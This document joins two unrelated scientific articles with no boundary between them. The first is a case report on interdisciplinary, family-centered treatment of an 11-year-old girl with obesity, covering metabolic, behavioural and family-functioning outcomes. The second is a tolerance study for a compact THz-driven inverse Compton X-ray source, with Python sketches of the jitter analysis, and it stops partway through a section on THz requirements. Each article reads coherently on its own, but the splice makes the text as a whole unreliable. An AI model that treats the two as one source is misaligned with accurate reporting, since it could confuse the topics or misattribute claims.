An interdisciplinary, family-centered approach to treating pediatric obesity in an 11-year-old female: a case report
Pediatric obesity has become increasingly prevalent over the past 2-3 decades. Recently published clinical practice guidelines and expert recommendations provide guidance for obesity treatment, but therapy is often complicated by a host of medical, behavioural, psychosocial, and interpersonal issues. We report the case of an 11-year-old obese girl and her family referred for weight management. Our case underscores the need for an interdisciplinary, family-centered approach to the assessment and treatment of pediatric obesity, and highlights the value of understanding the familial complexities that often accompany this health issue. The importance of utilizing multiple health indicators to assess weight management 'success' is discussed.
Introduction
Given the high prevalence of obesity and its concomitant health risks, clinicians have an important therapeutic role to play in helping obese children and their families optimize weight-related cognitions and behaviours. The recent publication of clinical practice guidelines and expert recommendations offers clinicians evidence-based guidance for the treatment of pediatric obesity [1,2]. Building on this evidence, and based on our team's clinical experience, we believe there are two central issues that should guide how these recommendations are implemented. First, there is a critical need for an interdisciplinary team assessment at presentation to determine families' medical, behavioural, psychosocial, and interpersonal issues. Although an interdisciplinary assessment has been encouraged [1,2], the interplay between medical, behavioural, and psychosocial assessments has not been outlined in detail, and examples of tools and procedures for use in the clinical setting have not been specified. Second, to identify families' capabilities and readiness to make and maintain positive changes, a thorough exploration and understanding of familial complexities is needed for clinicians to help families achieve weight management success. Framed by these two issues, the case below highlights our team's approach in the context of one family.
Case presentation
An 11-year-old Caucasian (Canadian) obese girl was referred for weight management with her family. Prior to beginning treatment, the family underwent medical, behavioural, and psychosocial assessments by a pediatrician, nurse, dietitian, exercise specialist, and psychologist. The patient's BMI at intake was 29.9 kg/m² (age- and sex-specific BMI >98th percentile). She also had a high waist circumference (>95th percentile). Several obesity-related co-morbidities were identified, including mildly elevated blood pressure (>90th percentile), elevated total and LDL cholesterol (75th and 90th percentiles, respectively), and low HDL cholesterol (10th percentile) (Table 1). While fasting glucose was normal, insulin was elevated; acanthosis nigricans, a marker of insulin resistance, was observed at the neck. Family medical history indicated obesity, hyperlipidemia, and hypertension in both maternal and paternal families (Figure 1). A comprehensive lifestyle behaviour assessment, which included a 4-day food record, pedometer log, and physical activity record, was completed. Compared to other obese children enrolled in our weight management center [3], vegetable and fruit intake and physical activity were relatively healthy, but records highlighted several opportunities to make healthier choices, especially regarding intake of high sugar/high fat foods and sedentary activity.
The patient's psychosocial history indicated difficulties with social skills, including struggles to develop and maintain friendships; she had repeatedly been accused of bullying during the past school year. She reported a preoccupation with her body and appearance, poor self-esteem, and being sensitive to social rejection. Data from the Child Behavior Checklist [4] indicated that her symptoms were within the 'clinical range' for social problems, internalizing problems, and total problems; scores fell in the 'borderline range' for anxiety and depression. Scores on the Parenting Stress Index (PSI) [5], a measure of situational stressors, indicated that the mother found her daughter's demandingness and mood stressful, and that she failed to meet parental expectations for attractiveness and pleasantness. A family social assessment indicated a history of instability in the past year (Figure 1). The patient's parents had unexpectedly separated and paternal visitation was sporadic. Changes to the family structure occurred (i.e., parental separation, new parental partners, birth of a sibling), and there were several family relocations. Throughout her parents' relationship, the patient assumed a parentified role in the family and was struggling to adapt to role changes with the addition of new parental figures. The life stress score on the PSI was elevated. Family functioning, as measured by the Family Adaptability and Cohesion Evaluation Scales [6], indicated relatively healthy levels of family cohesion and flexibility, but the mother reported dissatisfaction with the family system and the family's communication patterns. Following these assessments, a team case conference, and discussion with the family, all agreed on the family's need and readiness for weight management. [Table 1 footnotes: (1) includes high energy-dense foods that are high in sugar and/or fat and low in nutrients; (2) time to exhaustion on a treadmill walking test using a modified Balke protocol; (3) change is positive from 'low' to 'moderate' score; (4) change is positive from 'low-balanced' to 'average-balanced'.]
Subsequently, the patient's mother and partner enrolled in a 16-week, group-based weight management intervention. This evidence-based program was consistent with current pediatric obesity treatment recommendations and included working with parents as agents of change on behalf of the family. Lifestyle changes were contextualized within the family system, an approach that can be more effective than working with children exclusively or parents and children together [7,8]. The intervention focused on helping the patient's mother and partner to set nutrition, physical activity, communication, and relationship goals that built on family strengths and enhanced areas (identified by the family) that needed improvement. The patient's mother and partner attended 15/16 sessions. During this time, the patient attended six adjuvant individual psychotherapy sessions that focused on coping with difficult peer situations and depressed mood.
At the end of the intervention, the patient's BMI and BMI percentile had decreased slightly, but she was still classified as obese (Table 1). Improvements in several metabolic risk factors were also noted. Lifestyle behaviour assessments indicated increased vegetable and fruit intake, decreased intake of high sugar/high fat foods, and reduced screen time. While steps/day decreased, the patient improved her time on the treadmill test by >5 minutes, indicating an improved level of cardiorespiratory fitness. The patient's depressive symptoms improved, and all subscales of the Child Behavior Checklist improved to within the 'normal range'. Her mother reported a more positive view of her daughter and found her behaviour less stressful. While life stress for the family remained the same, family communication, satisfaction, and family cohesion and flexibility all improved following the intervention (Table 1).
Discussion
Our clinical assessments in this case included an examination of physical, behavioural, psychosocial, and interpersonal issues. This detailed evaluation assisted us, both clinicians and the family, in identifying health improvements over the course of treatment. It is worth noting that the traditional measurements (Table 1) often taken to evaluate pediatric obesity treatment success may foster a pessimistic view of the family's intervention, since only modest anthropometric changes were noted. However, in the absence of intensive therapy (i.e., bariatric surgery), it can take an extended period for a patient's weight status to improve substantially. As an initial goal, one of the key recommendations in pediatric weight management is to achieve weight maintenance, followed by weight loss if warranted. A singular focus on weight loss to gauge treatment success may undermine many other healthy family changes; in our view, the extensive measurements we completed provided a comprehensive view of the physiological, lifestyle, and family-related changes. These measures also gave us the opportunity to highlight areas of strength within the family to help encourage them to make further lifestyle changes. By emphasizing the family's positive changes (i.e., reductions in blood pressure and cholesterol, increased dietary quality and cardiorespiratory fitness, and improved family dynamics), the family was able to identify meaningful health improvements and was motivated to continue making changes. While the procedures required to collect this information can be labor-intensive for clinicians and time-consuming for families, these data provide relevant information upon which families can establish specific and tailored treatment goals. In addition, families are able to base their goals on objective data that serve as clinically meaningful benchmarks.
Our interdisciplinary, integrated approach enabled our team to help this family develop strategies during the intervention for family-wide changes. Parents were encouraged to understand how their busy schedules and family disruptions impacted lifestyle behaviour goals, and how they could work together as a parenting unit to make changes while being mindful of potential roadblocks. Although this family was attempting to manage many stressors, they also had several strengths. The mother and her partner were highly motivated and were willing to work together to make lifestyle changes for the family rather than just helping their daughter to make changes on her own. The contextual information we derived from clinical interviews with the family, combined with valid and reliable psychosocial and family-related questionnaires [4-6], enabled us to form a comprehensive perspective of this family. This case demonstrates that lifestyle changes are made within the context of family functioning, and that clinicians must be mindful of family complexity, schedules, and norms when making recommendations. For example, if immediate lifestyle behavioural changes prove to be particularly challenging and the psychosocial/familial assessment determines that a family is under a high level of stress or dealing with tumultuous personal problems, modest treatment goals or deferral of treatment should be discussed with families. Family complexity does not necessarily limit a family's ability to make changes. If a family has a high level of awareness and has the ability to manage their stressors, treatment should be initiated.
Conclusion
Lifestyle changes occur for obese children within the context of their families. An integrated interdisciplinary assessment of the family environment and functioning, one that augments traditional weight management metrics, is necessary to make evidence-based (and practical) recommendations. The degree of family complexity, along with a family's strengths and barriers to change, must also be taken into account. It is necessary to assess a number of health indicators that are relevant to pediatric obesity, not only to identify co-morbid conditions, but to identify areas of improvement as a way of optimizing family motivation. Often, once improvements are made in psychosocial or interpersonal domains, new opportunities emerge for families to make healthier nutrition and physical activity choices. We submit that in lieu of a traditional, reductionistic approach that focuses exclusively on weight loss as the indicator of success, pediatric obesity should be conceptualized as a complex issue that requires an interdisciplinary, integrated, and evidence-based response that includes weight loss as one of several important treatment outcomes. We believe delivering obesity treatment services in this manner will also be beneficial for clinicians, who often experience frustration and feel ineffectual when traditional indicators of weight management success are not achieved.
Abbreviations
None.
Challenges and tolerances for a compact and hybrid ultrafast X-ray pulse source based on RF and THz technologies
We present an in-depth tolerance study and investigation of the main challenges towards the realization of a hybrid compact ultrafast (fs to sub-fs) X-ray pulse source based on the combination of a conventional S-band gun as electron source and a THz-driven dielectric-loaded waveguide as post-acceleration and compression structure. This study allows us to determine which bunch properties are most affected, and to what extent, by variations of the parameters of all the beamline elements relative to their nominal values. This leads to a definition of tolerances for the misalignments of the elements and the jitter of their parameters, which are compared to the state-of-the-art in terms of alignment precision and stability of operation parameters. The most challenging aspects towards the realization of the proposed source, including THz generation and manufacturing of the dielectric-loaded waveguide, are finally summarized and discussed.
Introduction
Particle acceleration beyond the few-MeV level currently requires large infrastructures, of the order of several meters or tens of meters, due to the low operating frequencies (a few GHz) and field amplitudes (a few tens of MV/m in the meter-long structures) of conventional RF accelerating structures. The same remark holds for the schemes used to compress electron bunches down to durations of a single femtosecond or below. This is indeed typically done via velocity bunching [1], requiring several-meter-long accelerating structures and/or drift spaces, or in magnetic chicanes, whose length depends on bunch energy but is typically a few meters.
One of the schemes currently investigated to overcome these limitations, and achieve compact accelerators delivering pC-level ultrashort (fs to sub-fs duration) electron bunches with an energy above the MeV level, is to use dielectric-loaded structures driven by laser-generated THz pulses [2-5] (throughout this paper, we consider the THz frequency range to span 100 GHz to 10 THz). In these structures, the frequencies (100 GHz to 10 THz) and field amplitudes (up to a few GV/m) are expected to be much higher than in conventional RF structures. This would allow bunch acceleration and compression by velocity bunching within a few tens of cm, thus reducing the footprint of accelerator beamlines.
One of the first potential applications of THz-driven accelerating structures is to build a compact ultrafast X-ray source based on Inverse Compton Scattering (ICS) [6], delivering fs to sub-fs pulses. However, due to the high frequency, high field amplitude and reduced transverse dimension of THz-driven structures, tolerances to jitters and beamline imperfections are expected to be tight and to represent one of the main challenges towards such compact X-ray sources. In this paper, we present an in-depth tolerance study (Section 2) and investigation of the main challenges (Section 3) for the realization of a concept of hybrid and compact ultrafast (fs to sub-fs) X-ray pulse source based on ICS, previously investigated by the authors [7,8] within the context of the AXSIS project [9]. The tolerance study aims to define the acceptable margins for several beamline imperfections and various experimental jitters, thus determining which of them are the most challenging to be met.
A schematic layout of the concept of ultrafast X-ray pulse source considered in this paper is shown in Figure 1 (top). The electron source is a conventional laser-driven 1.6-cell S-band RF-gun operating at 2.9985 GHz with its peak field amplitude fixed at 140 MV/m, corresponding to the maximal gradient experimentally achieved with a BNL/SLAC/UCLA gun [10,11]. A solenoid electromagnet is then used to focus the beam for injection into a THz linac, consisting of a partially dielectric-loaded circular waveguide (DLW) (see Figure 1 bottom) driven by a multicycle THz pulse exciting the TM01 mode [12,13]. In the THz linac, the electron bunch is simultaneously accelerated up to 15-20 MeV and compressed down to a duration of a single femtosecond or below. The beam exiting the THz linac is finally focused by a triplet of quadrupole electromagnets to the ICS point, where it interacts with an infrared laser to generate X-rays through ICS. More details on the beam dynamics and on the optimization of the layout presented in Figure 1 are available in [7,8]. As the reference case for the tolerance study, we use typical electron bunch properties at the ICS point simulated with ASTRA [14] for a 1 pC charge. They are presented in Table 1, with the following symbols used throughout the paper to denote the electron bunch properties: Q (charge), <E> (average kinetic energy), σE (rms energy spread), σt (rms length), σx-σy (rms transverse horizontal-vertical size) and εx-εy (rms normalized transverse horizontal-vertical emittance). The values in Table 1 are simulated with the following reference beamline parameters:
• Gun region: Peak field Emg = 140 MV/m; UV laser rms duration σt,UV = 75 fs (Gaussian profile) and transverse size σr,UV = 0.5 mm (Gaussian profile cut at 1σ); Solenoid peak field B0 = 0.258 T.
• THz linac: THz pulse central frequency f = 300 GHz; Field amplitude Eml = 115 MV/m.
The tolerance study is divided into, and conducted separately for, the four main sections of the layout shown in Figure 1, namely the RF-gun region (RF-gun, UV laser and solenoid), the THz linac, the quadrupole triplet and the ICS interaction region. In this way, the conclusions drawn from the study are not limited to the specific layout shown in Figure 1, but can also be of interest for other applications implying THz-driven DLWs, especially applications relying on injection from a conventional RF-gun into such a DLW.
Tolerance study
Different approaches have been used to perform the tolerance study.
For a single and constant beamline imperfection, for example a misalignment, a simple parameter scan has been performed with ASTRA to determine the tolerances. When jitters of beamline parameters are involved, the relevant quantities for determining the tolerances are the distribution and partition functions of the electron bunch properties at the ICS point under the assumed jitters.
To study a single jitter of a beamline parameter, the procedure is first to run a scan with ASTRA in which the parameter is varied step-by-step within a range covering the jitter window. The beam properties at the ICS point are recorded for each step. For each beam property, the obtained values are then fitted with Matlab to obtain continuous curves over the parameter variation range. Finally, a jitter following a Gaussian distribution with a standard deviation σjit around the parameter's nominal value is simulated with Matlab. A large number of values (of the order of 10^6) of the jittering parameter are randomly generated following a Gaussian distribution (with a cut-off at ±3σjit). For each value, the beam properties are determined using the curves previously obtained with Matlab and recorded. This delivers histograms of the beam properties at the ICS point. Normalizing these histograms, such that their integrals become equal to 1, leads to the distribution functions of the beam properties. An integration of the distribution functions leads to the partition functions of the beam properties.
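As a minimal sketch of this single-jitter procedure, the following Python snippet stands in for the Matlab steps (the response curve, σjit value and bin counts are illustrative assumptions, not the ASTRA scan results):

```python
# Minimal sketch of the single-parameter jitter analysis described above.
# A toy quadratic response stands in for the ASTRA scan of one beam property.
import numpy as np

rng = np.random.default_rng(0)

# Step 1: pretend these points came from an ASTRA scan of one parameter.
scan_values = np.linspace(-0.05, 0.05, 21)      # parameter detuning (a.u.)
scan_sigma_E = 1.0 + 40.0 * scan_values**2      # toy response: sigma_E vs detuning

# Step 2: fit a continuous curve through the scan points (quadratic here).
response = np.poly1d(np.polyfit(scan_values, scan_sigma_E, deg=2))

# Step 3: draw ~1e6 Gaussian jitter samples, cut at +/- 3 sigma_jit.
sigma_jit = 0.01
samples = rng.normal(0.0, sigma_jit, size=1_000_000)
samples = samples[np.abs(samples) <= 3.0 * sigma_jit]

# Step 4: histogram of the resulting beam property -> distribution function
# (normalized to unit area), then cumulative sum -> partition function.
values = response(samples)
hist, edges = np.histogram(values, bins=200)
bin_width = edges[1] - edges[0]
distribution = hist / (hist.sum() * bin_width)
partition = np.cumsum(distribution) * bin_width

threshold = edges[np.searchsorted(partition, 0.9)]
print(f"90% of shots have sigma_E below {threshold:.3f} (toy units)")
```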
To study the simultaneous influence of several beamline imperfections and/or parameter jitters, we use the ERROR namelist of ASTRA [14]. This namelist allows running ASTRA for a given number of iterations, where at each iteration a user-defined list of parameters is randomly varied following Gaussian distributions (the standard deviations σjit of the distributions are user-defined for all the parameters) with a user-defined cut-off (±3σjit in our case). Histograms of the beam properties at the ICS point are obtained in this way, and subsequently their distribution and partition functions are computed as explained above. This method is expensive in terms of computing time, which explains why simpler and faster methods are used when only a single beamline imperfection or parameter jitter is studied.
Throughout Section 2, the displayed variations of the electron bunch properties are relative to the reference case shown in Table 1.
A last important point is that the reference case of Table 1 used for the tolerance study is simulated assuming a THz linac with f = 300 GHz. One should note that the higher f, the tighter the tolerances are. Therefore, for cases with f < 300 GHz, the tolerances would be relaxed, by a factor close to the frequency ratio, compared to what is derived in the present section for 300 GHz.
RF-gun region
For the RF-gun region, from the cathode to the THz linac entrance, the influence of jitters of the following parameters on the electron bunch properties at the ICS point is studied: RF-gun field amplitude, dephasing between the UV laser driving the gun and the RF field, UV laser pulse energy, UV laser pointing and solenoid peak field.
We first study these jitters altogether, because their combination drives two important jitter sources: the arrival timing jitter and pointing jitter of the electron bunch at the THz linac entrance. Table 2 shows the rms values we assumed for the Gaussian distributions of the jitters in ASTRA. We found σE and σt to be the most affected properties under the assumed jitters (see Figures 2 (a) and (b)). This was expected, since the studied jitters induce a significant jitter of the bunch arrival timing at the THz linac entrance, and thus of the bunch injection phase into it, to which σE and σt are very sensitive.
[Figure 2 caption, panels (c) and (d): Variation of σE (c) and σt (d) at the ICS point as a function of the detuning of the individual parameters shown in Table 2 relative to their nominal values. The nominal bunch properties are given in Table 1.]
The values assumed in Table 2 for the jitters are still not fully satisfactory. For example, 20% of the shots exhibit a variation of σE greater than +25% (see Figure 2 (a)). To determine which of the jittering parameters of Table 2 has the strongest influence, we decoupled them and studied the variation of σE and σt as a function of each parameter's detuning, expressed in units of the rms values shown in Table 2. This is shown in Figures 2 (c) and (d), which first show that the parameters' detuning does not influence σE and σt identically. Indeed, the strongest variations occur for opposite detuning signs (positive detuning for σE and negative detuning for σt). For the opposite directions, the variations remain more limited. Figures 2 (c) and (d) then show that, for both σE and σt, the strongest influences are from the RF-gun phase and field amplitude jitters. The values assumed in Table 2 for these jitters are at the current state-of-the-art, and even slightly below for the phase [15-19]. Significantly improving the stability of σE and σt at the ICS point would therefore require improving the RF-gun phase and field amplitude stability beyond the current state-of-the-art, and is therefore challenging. Figure 2 (c) also shows that between +1 and +6 units, the contribution of a UV laser pulse energy detuning to the variation of σE is around one half (one third) of the RF-gun field amplitude (phase) contribution. A small gain could therefore be obtained by reducing its jitter, which is feasible according to the current state-of-the-art of laser intensity stability [20].
THz linac region
For the THz linac, we first study the field amplitude and phase jitters. The phase jitter represents here only the contribution of the internal phase jitter of the THz pulse source, and does not include the contribution of the electron bunch arrival timing jitter at the THz linac entrance. We then study the influence of THz linac misalignments: translation along x, y and z and rotation around x and y (see Figure 1 for definition).
THz linac field amplitude and phase jitters.
Regarding the THz linac field amplitude, our simulations show that a jitter mostly affects <E>, σE, σx and σy. A 1% rms jitter would already provide a stability of the electron bunch properties reasonable for operation. In fact, Figure 3 (a) shows that, for the most affected property σy, 90% of the shots then exhibit a variation lower than 10%. It also shows that stability deteriorates rapidly beyond this level: for a 3% rms jitter, 30% of the shots vary by more than 30%.
Regarding the THz linac phase, a jitter mostly affects <E>, σE and σt. It has to be significantly below 1° rms (≡ 10 fs at 300 GHz) for reasonably stable operation. In fact, Figure 3 (b) shows that if this is not the case, for the most affected property σE, 20% of the shots will exhibit a variation greater than +35% and potentially up to +120%. Figure 3 (b) shows that this percentage falls to zero for a jitter below around 0.33° rms (≡ 3 fs at 300 GHz).
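The phase-to-time equivalences quoted above follow directly from one RF period spanning 360°; a minimal check (the frequency is taken from the text):

```python
# Phase-to-time conversion for the THz linac phase jitter tolerances above.
f = 300e9                                       # THz linac frequency in Hz
for phase_deg in (1.0, 0.33):
    jitter_fs = phase_deg / 360.0 / f * 1e15    # one period = 360 deg = 1/f
    print(f"{phase_deg} deg rms at 300 GHz = {jitter_fs:.1f} fs rms")
# -> 1 deg ~ 9.3 fs (quoted as ~10 fs); 0.33 deg ~ 3.1 fs (quoted as ~3 fs)
```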
A more detailed study on the influence of these two jitters is available in [8]. As explained later in Section 3.1, a promising option to fulfil the requirements in terms of THz pulse power and duration is laser-based THz generation. In this case, the achievable stability for the THz linac field amplitude and phase directly results from the stability of the source laser for the THz pulse driving the THz linac. A 1% rms energy jitter, and even below, is already achievable with state-of-the-art Joule-class lasers [21], and would be compatible with the aforementioned tolerances. The aspect of the phase stability remains to be investigated.
THz linac misalignments.
The THz linac translation relative to its nominal position has been studied up to +/-0.6 mm along x and y and up to +/-1 mm along z. Its rotation relative to its nominal position around the x and y axes has been studied up to 9 mrad (≈ 0.52°) with respect to the THz linac entrance and up to 13 mrad (≈ 0.75°) with respect to the THz linac center.
[Figure 4 caption: Variation of σE and σt at the ICS point as a function of a THz linac transverse offset along y (c) and rotation around y with respect to its center (d). Variation of σx and εx (resp. σy and εy) at the ICS point as a function of a THz linac rotation around x (e) (resp. y (f)) with respect to its entrance. The nominal bunch properties are given in Table 1.]
Figures 4 (a) and (b) show that the charge losses start to become significant when the THz linac transverse offset (resp. rotation) exceeds 200 μm (resp. 3 mrad (≈ 0.17°)). A 200 μm transverse offset starts to be reasonable for the electron bunch properties, the most affected (σE) varying by +20% (for an offset along y) as shown in Figure 4 (c). Conversely, a 3 mrad THz linac rotation is too large. In fact, as shown in Figures 4 (d), (e) and (f), the variations of σE, σt, σx, εx, σy and εy could then respectively exceed +75%, +250%, +50%, +65%, +100% and +140%. Keeping these variations under +20% requires a rotation below 1 mrad (≈ 0.06°) for σx, σy, εx and εy, and below 0.5 mrad (≈ 0.03°) for σE and σt. The asymmetry in the bunch properties' variations with THz linac translation (rotation) along (around) x or y, although the THz linac and its field are cylindrically symmetric, comes from the asymmetric transverse focusing provided by the quadrupole triplet downstream.
The 200 μm and 1 mrad (0.5 mrad) tolerances on the THz linac transverse offset and rotation are well within what is achievable with commercially available precision positioning devices like hexapods, which can reach the 10 nm and 1 μrad levels for the absolute position. However, the THz linac alignment will in practice be relative to the other beamline elements. Its practical precision will therefore be ultimately defined by a beam-based alignment procedure, whose precision remains to be investigated and is very likely worse than that of the positioning device.
Quadrupole triplet region
For the quadrupole triplet, we study the influence of a quadrupole gradient jitter and of quadrupole misalignments: translations along x, y and z and rotations around x, y and z (see Figure 1 for definition).
Quadrupole gradient jitter.
A detuning of the gradients is studied, first independently for the three quadrupoles, in a range of +/-2% around the nominal gradients. Only the bunch transverse size, especially σy, is found to be significantly affected by a quadrupole gradient detuning, especially of the 2nd quadrupole, over the studied range (see Figures 5 (a) and (b)). However, the variations of σx and σy become significant only for large quadrupole gradient detunings (typically > 0.5%), much larger than the stability achievable in practice. In fact, commercially available magnet power supplies can deliver a current stability at the 10 ppm level.
Even in the case where the three quadrupoles all have a large uncorrelated 0.5% rms gradient jitter, the variation of σx remains below 10% (see Figure 5 (c)) and less than 10% of the shots exhibit for σy a variation higher than +20% (see Figure 5 (d)). The quadrupole triplet gradient stability is therefore not expected to represent a challenge for the investigated X-ray pulse source concept.
Quadrupole misalignments.
The misalignments are studied independently for the three quadrupoles. The translations relative to their nominal positions are studied up to +/-0.5 mm along x and y and up to +/-1 mm along z. The rotations relative to their nominal positions are studied up to 20 mrad (≈ 1.15°) around x, y and z. Figure 6 shows the properties and cases for which the tolerances are the tightest.
A translation along y of the 3rd and especially the 2nd quadrupole mostly affects σE and σt (see Figures 6 (a) and (b)) and also, to a lesser extent, σy and εy. The asymmetry between the two transverse directions x and y is due to the asymmetric transverse focusing provided by the quadrupole triplet, where the electron bunch is first defocused in the y direction before being strongly focused. With quadrupole alignment at or better than 30 μm in the y direction, already demonstrated [22,23], the variations of σE and σt would be kept below +8% according to Figures 6 (a) and (b).
The only quadrupole rotation found to have a significant influence on the bunch properties, over the studied range, is the one around z. A rotation around z of the 1st (resp. 2nd) quadrupole especially affects σy and εy (resp. σx and εx), as shown in Figures 6 (d) and (c). However, this influence will remain limited in practical conditions. Indeed, even with a rotation of 0.5° (9 mrad), much worse than what is currently achievable with mechanical alignment, the variations of σx,y and εx,y will remain below +20% according to Figures 6 (c) and (d).
[Figure 6 caption: Variation of σE (a) and σt (b) at the ICS point as a function of quadrupole translations along y. Variation of σx (c) and εy (d) at the ICS point as a function of quadrupole rotations around z. The nominal bunch properties are given in Table 1.]
ICS region
The achievable X-ray pulse properties with the layout shown in Figure 1 have been investigated through simulations (see [8] for details), showing its potential tunability between 2.9 and 11.5 keV with, for 400 mJ laser energy, 1.5×10^4 to 7.7×10^4 photons/pulse in 1.5% rms bandwidth. In this section, we study the influence of a misalignment between the electron bunch and the laser driving the ICS process, both in time and transversely, as well as the influence of a mismatch (without misalignment) between the electron bunch and laser transverse sizes at focus. In addition to the number of photons after collimation Nγ,θcoll, we use the spectral photon density (SPD), defined as the ratio between the number of photons and their rms bandwidth [24], as the figure of merit to be maximized for the X-ray pulse quality.
Nγ,θcoll scales like the inverse of the bunch transverse size squared [24], and the photon pulse bandwidth especially depends, among other contributions, on the bunch transverse size and energy spread [25]. To have a deeper insight into the tolerances for the ICS region, we therefore study four cases corresponding to four different sets of electron bunch properties, with different transverse sizes and energy spreads. Case 1 is the reference shown in Table 1 and Case 2 is the same with the rms transverse size artificially reduced to 6×6 μm². These two cases have a relatively large (0.7% rms) energy spread. Case 3 has been simulated with different beamline parameters and has the following properties: <E> = 16.33 MeV, σE = 23.8 keV, σt = 3.42 fs, σx/σy = 10.0/9.1 μm and εx/εy = 0.212/0.195 π·mm·mrad, and Case 4 is the same with the rms transverse size artificially reduced to 6×6 μm². These two cases have a relatively low (0.15% rms) energy spread (but longer length).
For the laser, we assume a wavelength of 1048 nm, 400 mJ pulse energy, a duration σt,L = 1 ps rms (Gaussian) and a round Gaussian transverse profile with an rms value σr,L fixed to the average of σx and σy of the electron bunch (except when a transverse size mismatch is considered). Figures 7 (a) to (f) show the relative variation of Nγ,θcoll and SPD for the four cases as a function of the transverse and time offset between the bunch and the laser, and as a function of the transverse size mismatch between them (the laser transverse size being varied). Figure 7 (g) shows the distribution and partition functions of the bunch transverse offset at the ICS point, coming from a simulation of Case 1 in which all the jitters previously mentioned and assumed in the paper are included.
[Figure 7 caption, assumed jitters: RF-gun region as in Table 2; THz linac: 1% (field amplitude) and 1° (phase) rms; quadrupole gradients: 0.5% rms.]
Figures 7 (a) and (b) show that Nγ,θcoll and SPD decrease in a similar way in all cases, and that the transverse offset between the laser and the bunch should be below 1 unit of σr,L to keep their decrease below -20%. As visible in Figure 7 (g), where Case 1 is considered, this is the case under the jitters assumed in the paper, since the offset is below 5 μm (0.47σr,L) for all the shots and the rms value of the distribution function is 1.8 μm (0.17σr,L).
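A rough feel for this ~-20% threshold can be obtained from a simple geometric-overlap estimate. The sketch below assumes round Gaussian transverse profiles of equal rms size for the bunch and laser at focus; it neglects the divergence, hourglass and bandwidth effects included in the full Figure 7 simulations, so it is an order-of-magnitude check rather than the actual model:

```python
# Hedged sketch: relative photon yield versus transverse bunch-laser offset,
# assuming round Gaussian profiles (overlap integral of two 2D Gaussians).
import numpy as np

def overlap_reduction(offset, sigma_e, sigma_l):
    """Yield relative to perfect alignment for a transverse offset."""
    return np.exp(-offset**2 / (2.0 * (sigma_e**2 + sigma_l**2)))

sigma_r = 10.6e-6                        # m, assumed equal bunch/laser rms size
for off_units in (0.17, 0.47, 1.0):      # offsets in units of sigma_r
    r = overlap_reduction(off_units * sigma_r, sigma_r, sigma_r)
    print(f"offset = {off_units:.2f} sigma_r -> N_gamma x {r:.2f}")
# A 1 sigma_r offset gives ~0.78, i.e. roughly the -20% level quoted above.
```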
Figures 7 (e) and (f) show that the cases with bigger transverse sizes (1 and 3) are the ones showing the slowest decrease of Nγ,θcoll and SPD when the time offset between the laser and the bunch increases. This is due to the decrease of the electron bunch and laser divergences in the vicinity of their focal point when their spot sizes increase. This means that they remain close to their focal sizes in a wider spatial range around their focal points, making Nγ,θcoll and SPD less sensitive to the time synchronization between them. For all cases, the time offset is reasonable if it remains below a few units of σt,L (typically 2 times, to avoid a decrease of Nγ,θcoll and SPD greater than 15%). This means that the synchronization between the bunch and the laser only has to be better than a few ps, which has already been demonstrated as achievable (see for example [26]). Figure 7 (c) shows that for all the cases Nγ,θcoll decreases in the same way when the laser becomes larger than the bunch. It first increases (before decreasing) when the laser becomes smaller than the bunch, but in a way that depends on the case. The cases with larger transverse sizes (1 and 3) show a greater increase (up to +45% versus up to +25%), with the maximum occurring for a smaller laser size (σr,L reduced by 60% versus by 40%), than the cases with smaller transverse sizes (2 and 4). This is due to the fact that the decrease of the number of electrons interacting with the laser is better compensated for Cases 1 and 3 by the Compton scattering cross-section increase when σr,L decreases than for Cases 2 and 4. Figure 7 (d) shows that the optimization of σr,L will be the most challenging for Case 1, namely for bunches with large transverse size and energy spread. Indeed, it is for this case that the variations around the SPD maximum are the sharpest. Besides, the SPD maximum is significantly shifted compared to the perfect matching, since it appears for σr,L reduced by 40%, making it harder to find in practice. For Cases 2 to 4, the optimization of σr,L will be less challenging and less important than for Case 1. First, the variations around the SPD maximum are less sharp. Then, the SPD maximum is closer to the perfect matching, since the required σr,L variation remains below 20%. Finally, the gain remains limited, since the SPD increase between the perfect matching and the σr,L maximizing it is below 10%.

THz requirements and generation

Table 3 gathers the THz pulse properties required to achieve the bunch properties shown in Table 1, and also those for f = 150 GHz (instead of 300 GHz). For 150 GHz, DLW transverse dimensions twice as big as for 300 GHz have been assumed, namely a = 1 mm and b = 1.1807 mm.
These properties have been calculated using a model starting from the analytical expression of the electromagnetic field of the TM01 mode in the DLW [12,13]. The value of b required to have a phase velocity vph equal to c is determined by solving the dispersion relation arising from the boundary conditions. From the dispersion relation, the dispersion curve (frequency as a function of wavelength) is computed, its derivative at f = 300 GHz (150 GHz) giving access to the group velocity vg. From vg, the THz pulse duration required to accelerate the beam over the full DLW length L is calculated. The peak power required to achieve the desired field amplitude is obtained by integration of the complex Poynting vector over a DLW transverse cross-section. Finally, the THz pulse energy is computed by multiplying the peak power by the duration. Detailed information about the equations and procedures used for the derivation of the properties shown in Table 3 is available in [8]. Four main methods are currently used to generate fields in the THz range: gyrotrons [27-29], optical rectification of laser pulses in non-linear optical crystals [30-32], CSR/FEL radiation generated in accelerators [33-35] and beam-driven wakefields (for example in dielectric-loaded structures) [36-38]. The methods based on CSR/FEL and beam-driven wakefields require a conventional accelerator with a final bunch energy largely above a few MeV (the energy achievable with a conventional RF-gun), and are thus incompatible with a compact X-ray source. However, the beam-driven wakefield is the method coming closest to the requirements of Table 3, if not fulfilling them, and can thus be useful to perform proof-of-principle experiments. Gyrotrons are currently limited to a few MW of peak power, significantly below the requirements, but in long pulses. Using them would require a change of approach: not a travelling-wave structure, like the DLW assumed in this paper, but a standing-wave structure allowing the THz energy to be stored and thus the power (≡ field amplitude) in the structure to be increased [39,40]. Until recently, laser-based THz generation fell far below the requirements. Recent experimental results separately demonstrate the generation of multicycle THz pulses fulfilling (or close to fulfilling) the requirements on the duration [32] and on the peak power [41], making laser-based THz generation an appealing candidate for our concept. However, several challenges remain. In particular, the combination of duration and peak power in a single pulse, and the field amplitude and phase stability of a laser-generated THz pulse (see Section 2.2.1), are still open questions and require research efforts to be addressed.
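The last two steps of this model reduce to simple arithmetic once vg and the peak power are known. The sketch below illustrates them with placeholder numbers; L, vg and the peak power are assumptions chosen for illustration, not the actual Table 3 values:

```python
# Sketch of the duration and energy steps of the THz-requirement model above.
c = 299_792_458.0        # speed of light, m/s

L_dlw  = 0.30            # m, DLW length (assumed, "a few tens of cm")
v_g    = 0.45 * c        # group velocity from the dispersion-curve slope (assumed)
P_peak = 50e6            # W, peak power from the Poynting-vector integral (assumed)

# The THz pulse travels at v_g while the ~c electron slips forward through it,
# so the pulse must last at least the slippage time over the full DLW length.
tau = L_dlw / v_g - L_dlw / c
energy = P_peak * tau    # flat-top approximation: energy = peak power x duration

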